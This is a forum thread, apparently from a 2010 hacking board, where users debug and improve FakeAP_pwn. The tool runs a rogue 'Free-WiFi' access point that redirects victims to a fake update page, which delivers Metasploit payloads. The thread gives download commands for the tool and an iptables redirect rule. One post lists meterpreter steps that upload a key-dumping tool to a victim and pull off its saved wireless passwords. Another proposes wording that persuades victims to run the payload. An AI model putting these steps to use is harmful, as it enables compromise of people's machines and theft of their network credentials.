
Thread: [Script] [Video] FakeAP_pwn (v0.2.1)

  1. #101
    Member joker5bb
    Join Date
    Feb 2010
    Posts
    166

    Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Get the latest revision by:
    Code:
    svn export http://fakeap-pwn.googlecode.com/svn/trunk/fakeAP_pwn.sh fakeAP_pwn.sh
    See if this works without making changes; I disabled SSLstrip for now.

    *Also get the latest version of dhcp3-server (3.1.3) from Ubuntu.
    Last edited by joker5bb; 07-10-2010 at 04:58 PM.

  2. #102
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Still seems to be working great, minus uploading, which I believe is probably an issue with my card.

    Timed it: 10 minutes and still nothing.
    Last edited by slowz3r; 07-10-2010 at 05:44 PM.

  3. #103
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    17

    Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Nope, no N capability on my hosting card. What N cards are you connecting with? Mine is a DW1525 in a Dell desktop.
    I'm connecting with a D-Link DWA-130 wireless-N dongle. Also, when I connect to the AP with my G card, I don't even have to touch network location for connectivity; it's instant regardless.

    Progress report for 0.3-RC13:
    Same results I posted for RC10 when it comes to signal strength, ping times, etc.

    - DHCP has been upgraded to 3.1.3 (slightly faster with my G card, otherwise no difference).

    DWA-130 (wireless-N): no connectivity with the DHCP server at all on this card, no IP / network access at all.
    WG111v3 (wireless-G): instant connectivity with DHCP, website redirection working, both download links working. Neither VNC nor SBD progresses past the output below..


    ^ Haven't been able to pass this point at all since resolving other issues. I'm not a big Ruby guy, so help/advice would be appreciated..

  4. #104
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Newest version...
    fakeAP_pwn-v0.3-RC16.tar.gz
    [OUT OF DATE]

    *this is the last time you will need to download from mediafire!*
    Next time...to update:
    Code:
    bash fakeAP_pwn.sh -u
    Last edited by g0tmi1k; 07-31-2010 at 11:37 AM.
    Have you...g0tmi1k?

  5. #105
    Moderator g0tmi1k
    Join Date
    Feb 2010
    Posts
    1,771

    Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    I'm going to start off and just say...WOW! Thanks everyone! (=
    Quote Originally Posted by kernel831 View Post
    Another progress report for you.. running 0.3-RC10..

    * Your WiFi card + driver = Alfa card, rtl8187
    * Your kernel version = FRESH install of BT4 w/ 2.6.30.9
    * Signal strength of the AP = 100%
    * The time it takes to ping the AP = avg 23 ms
    * The time it takes to ping google.com when connected to the fakeAP = avg 63 ms
    * Output: No errors
    * MTU set to match my card / router at 1500.
    * There is some definite inconsistency with DHCP, although after tweaking I'm successfully dishing out IPs with no problem.
    * The forced website redirection, download link (mirror link only; the update.microsoft.com link times out), and Apache server downloads all work flawlessly on XP.

    As for the exploit, both VNC and SBD are failing for me. It gets to the point of executing the .rb script; below is the output. It never passes this...


    As a note, still no AVs or firewalls on the hosts, and cache/cookies are cleared out before any of my tests. No connection, remote desktop, or remote command line is made. Good luck and great work so far.

    Modifications to 0.3-RC10 - commented out line #547:
    Code:
    #iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    EDIT (Important) - I believe that I may have found the variable giving people such scattered results with DHCP / limited connectivity! I continued some testing with my Windows 7 (x64) box, trying to duplicate the results I posted above..
    I've found that using a wireless-N adapter on the VICTIM computer will NOT be able to resolve with the DHCP server. For me, and my guess is many others, the repeated DHCP DISCOVER / DHCP OFFER requests are caused by incompatibility of the wireless-N card trying to connect with your injection/monitor-mode-compatible B/G card which is serving the AP..

    When switching out my wireless-N card for a wireless-B/G card, INSTANT SUCCESS!
    Fixed the DNS problem, so both links should work!
    Updated the Metasploit script, and I tested VNC and WKV; didn't do SBD...
    Thanks for the heads up about wireless N... I'll make a note of it for the final release of v0.3.
    I wouldn't have got this, as all my hardware is B/G )=

    Quote Originally Posted by slowz3r View Post
    Hmmmm, not sure if that's entirely true. It may be in some situations, but in my case my target PC is a Windows 7 x64 PC running a wireless-N card, and it connects to the AP with full connectivity, but it only gains "full connectivity" after selecting one of these options from the annoying pop-up window in 7.

    Yeah, nothing can be done about the pop-up...sorry!
    *Idea - what if you were to "clone" (SSID and MAC) an AP that the client has been connected to - does it pop up then?*

    Quote Originally Posted by Jelly View Post
    a) It doesn't get anything; DHCP timeout and then it sets its private IP...
    b) Full strength
    c) Latest fakeAP_pwn v0.3-RC12 (read the first line of the output)
    d) Probes and joins FakeAP; nothing except the "default" in DHCP (I'll check it later)
    Cheeky. Though thanks for the info.
    Have you...g0tmi1k?

  6. #106
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by g0tmi1k View Post
    I'm going to start off and just say...WOW! Thanks everyone! (=

    Yeah, nothing can be done about the pop-up...sorry!
    *Idea - what if you were to "clone" (SSID and MAC) an AP that the client has been connected to - does it pop up then?*

    Hmm, I'll give that a try for fun. The pop-up doesn't really bug me; I just never noticed a lack of connectivity because I didn't select one of those options before, is all.

  7. #107
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    17

    Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Not sure how that network location system really works (but I'm sure it's not too hard to figure out), but since I have been testing this over and over with the same ESSID it's basically registering the network as "Free-WiFi 1, Free-WiFi 2, etc." I'm currently at like Free-WiFi 12.

    This is just a guess, but considering we're spoofing our MAC address before we put out the AP every time, I believe that it's saving according to BSSID rather than ESSID.

    Another thing you would have to overcome for that system to work is actually knowing the BSSID and ESSID of the AP he's been connected to in order to change your settings accordingly. If you can somehow gather the information from the victim I think it's doable, but I think gathering that information in the first place will be very difficult.

    I'll test out the new version in a bit here and post a report later. Good luck.
    ########################################

    EDIT for progress - I have tried RC16 with the same results: everything working very efficiently up until the Ruby script to connect with the payload. Same window that I posted earlier.
    Last edited by kernel831; 07-11-2010 at 08:39 PM. Reason: Additional information

  8. #108
    Member
    Join Date
    Mar 2010
    Location
    Somewhere in CA
    Posts
    98

    Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Quote Originally Posted by kernel831 View Post
    Not sure how that network location system really works (but I'm sure it's not too hard to figure out), but since I have been testing this over and over with the same ESSID it's basically registering the network as "Free-WiFi 1, Free-WiFi 2, etc." I'm currently at like Free-WiFi 12.

    This is just a guess, but considering we're spoofing our MAC address before we put out the AP every time, I believe that it's saving according to BSSID rather than ESSID.

    Another thing you would have to overcome for that system to work is actually knowing the BSSID and ESSID of the AP he's been connected to in order to change your settings accordingly. If you can somehow gather the information from the victim I think it's doable, but I think gathering that information in the first place will be very difficult.

    I'll test out the new version in a bit here and post a report later. Good luck.
    ########################################

    EDIT for progress - I have tried RC16 with the same results: everything working very efficiently up until the Ruby script to connect with the payload. Same window that I posted earlier.
    Don't feel bad, I'm on Free WiFi connection 26.

    I think I might head to the store and pick up a different WiFi card to see if that speeds up upload, because it shouldn't be taking 20 minutes to get nowhere lol

  9. #109
    Senior Member
    Join Date
    Jun 2007
    Location
    UK
    Posts
    175

    Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Just started testing RC16.
    Run with payload=wkv: client connects OK, downloads no problems, run download and script hangs at "Downloading keys" (I stopped it after 10 minutes).
    Re-run with payload=sbd: everything's great and I get a session at a little over 1 minute, and the client gets the internet.

    I have successfully downloaded the wireless keys in the meterpreter> session as follows:
    Code:
    upload /var/www/fakeAP_pwn/wkv.exe c:
    execute -f cmd -c
    interact 4 (4 is the number displayed in previous execute command)
    cd \
    c:\> wkv /stext wirekeys.txt
    exit
    download /wirekeys

    Just an idea until the speed issue is fixed: amend index.php with some notes, i.e. "This update is large and may take up to 2 minutes to complete, so please be patient!" Also add some notes/instructions about how to run the downloaded file, as most victims won't have a clue after selecting the download.

  10. #110
    Member joker5bb
    Join Date
    Feb 2010
    Posts
    166

    Re: [Script] [Video] FakeAP_pwn (v0.2.1)

    Guys, make sure you test the latest revision, so just run:
    Code:
    svn checkout http://fakeap-pwn.googlecode.com/svn/trunk/ fakeap-pwn-read-only
